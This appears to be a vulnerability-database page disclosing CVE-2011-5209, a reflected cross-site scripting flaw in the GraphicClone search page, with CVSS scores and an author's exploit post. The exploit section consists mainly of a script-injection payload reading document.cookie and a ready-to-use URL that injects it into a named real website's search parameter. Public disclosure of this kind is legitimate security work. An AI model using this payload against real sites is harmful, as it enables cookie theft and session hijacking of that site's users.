GraphicClone Cross Site Scripting

2011-12-26 / 2012-10-10

Credit: Mr.PaPaRoSSe

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2011-5209

CWE: N/A

CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

# Exploit Title: GraphicClone XSS
# Date: 24.12.2011 - 13.18
# Author: Mr.PaPaRoSSe
# Tested On: Win7
# Platform: Php

-------------------------------------------------------------
SearchBOX
graphics.cloneforest.com/search/

<script>alert(document.cookie)</script>

http://graphics.cloneforest.com/search/?term=<script>alert(document.cookie)</script>

XSS
-------------------------------------------------------------
Mr.PaPaRoSSe / 3spi0n 
paparosse.blogspot.com
GrayHatz.co
------------------------------------------------------------- 		 	   		  

References:

http://paparosse.blogspot.com/

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

GraphicClone Cross Site Scripting

References:

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

GraphicClone Cross Site Scripting

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.